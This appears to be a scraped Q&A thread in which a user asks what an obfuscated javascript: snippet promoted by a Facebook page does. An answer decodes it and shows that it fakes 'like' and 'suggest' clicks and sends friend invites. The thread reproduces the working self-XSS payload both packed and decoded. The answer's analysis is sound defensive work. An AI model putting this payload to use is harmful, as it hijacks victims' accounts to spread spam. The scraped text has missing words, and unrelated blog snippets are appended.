facebook - What exactly does this piece of JavaScript do? -

-

i saw page growing in popularity among social circles on facebook, what 98 percent bla bla... , walks users through copying below javascript (i added indentation make more readable) address bar. looks dodgy me, have basic knowledge of javascript.

simply put, do?

javascript:(function(){ a='app120668947950042_jop'; b='app120668947950042_jode'; ifc='app120668947950042_ifc'; ifo='app120668947950042_ifo'; mw='app120668947950042_mwrapper'; eval(function(p,a,c,k,e,r){     e=function(c){         return(c<a?'':e(parseint(c/a)))+((c=c%a)>35?string.fromcharcode(c+29):c.tostring(36))}     ;     if(!''.replace(/^/,string)){         while(c--)r[e(c)]=k[c]||e(c);         k=[function(e){             return r[e]}         ];         e=function(){             return'\\w+'}         ;         c=1}     ;     while(c--)if(k[c])p=p.replace(new regexp('\\b'+e(c)+'\\b','g'),k[c]);     return p} ('j e=["\\n\\g\\j\\g\\f\\g\\i\\g\\h\\a","\\j\\h\\a\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\k\\a\\l\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\m\\n\\g\\o","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\h\\f\\r\\f","\\g\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\h","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\p\\u\\x\\r","\\b\\l\\q\\l\\r\\b\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\b\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\s\\z\\w\\z","\\j\\y\\f\\r\\g\\h\\t\\g\\l\\i\\u\\o"];         d=u;         d[e[2]](v)[e[1]][e[0]]=e[3];         d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];         s=d[e[2]](e[6]);         m=d[e[2]](e[7]);         c=d[e[9]](e[8]);         c[e[11]](e[10],i,i);         s[e[12]](c);         c(d(){             w[e[13]]()}         ,e);         c(d(){             x[e[16]](e[14],e[15])}         ,e);         c(d(){             m[e[12]](c);             d[e[2]](y)[e[4]]=d[e[2]](z)[e[5]]}         ,e);         ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6c|x73|x6e|x61||x76|x67|x63|x45|x6d||x64|x6f|x5f|x68|x72|x75|x70|x79|x2f|settimeout|function|5000|x62|x4d|x6b|true|var|x42|x49|x48|x54|x4c|x66|x6a|x78|x2e|x44|document|mw|fs|socialgraphmanager|ifo|ifc|||||||'.split('|'),0,{ } ))})();

i don't know many downvoting this. absolutely right suspicious packed , otherwise-obfuscated scripts, rash of malvertisements affecting fb apps @ moment.

the first trick replace eval on results of unpacker alert can see code instead of executing it. gives can (but boringly) manually decode to:

document.getelementbyid('app120668947950042_mwrapper').style.visibility='hidden';         document.getelementbyid('app120668947950042_jop').innerhtml=document.getelementbyid('app120668947950042_jode').value; s=document.getelementbyid('suggest'); m=document.getelementbyid('likeme'); c=document.createevent('mouseevents'); c.initevent('click',true,true); s.dispatchevent(c);  settimeout(function(){     fs.select_all() }, 5000); settimeout(function(){     socialgraphmanager.submitdialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php') }, 5000); settimeout(function(){     m.dispatchevent(c);     document.getelementbyid('app120668947950042_ifo').innerhtml=document.getelementbyid('app120668947950042_ifc').value }, 5000);

that looks it's faking click on ‘like’ , ‘suggest’ buttons (and subsequent dialogue), circumventing normal controls fb require interact site.

i'd report page fb.

in general, asks enter javascript url no good. poor-man's-xss. allowing someone's code onto page through js url trusting them want use of site, crude social-engineering attempt demonstrates. it's depressing if lot of people falling this. maybe it's time browsers disallow typing javascript: urls in address bar.

curse netscape inventing ugly javascript: not-really-a-url hack , thousands of security holes have resulted it!


Comments

Post a Comment

Popular posts from this blog

javascript - Enclosure Memory Copies -

-
function myclass() { //lots , lots of vars , code here. this.bar = function() { //do numerous enclosed myclass vars } this.foo = function() { alert('hello'); //don't enclosed variables. } } each instance of myclass gets own copy of bar , foo, why prototyped methods use less memory. however, know more memory use of inner methods. it seems obvious me (1) below must true. agree? not distinct myclass instances have own distinct copies of bar, must have own distinct copies of myclass enclosure. (or else how bar method keep myclass variables straight on per instance basis?) now (2) question i'm after. since inner foo method doesn't use in myclass enclosure natural qustion is: javascript smart enough not keep myclass enclosure in memory use of foo? this depend entirely on implementation not language. naive implementations keep far more around others. answer true e.g. v8 (chrome's js engine) may not true spider...
Read more

php - Replacing tags in braces, even nested tags, with regex -

-
example preg_replace('/\{[a-za-z.,\(\)0-9]+\}/', 'replaced', 'lorem ipsum dolor sit {tag1({tag2()})}, consectetur adipiscing elit.'); the result: lorem ipsum dolor sit {tag1(replaced)}, consectetur adipiscing elit. question as can see "tag2" has been replaced, want replace "tag1" know how can this? (in cases might this: {tag1({tag2({tag3()})})}) , on.) btw using preg_replace_callback, easier show preg_replace here site can test code: http://www.spaweditor.com/scripts/regex/index.php you need add curly braces character set. here's pattern used: /\{[a-za-z.,\(\)\{\}0-9]+\}/ and here result: "lorem ipsum dolor sit replaced, consectetur adipiscing elit."
Read more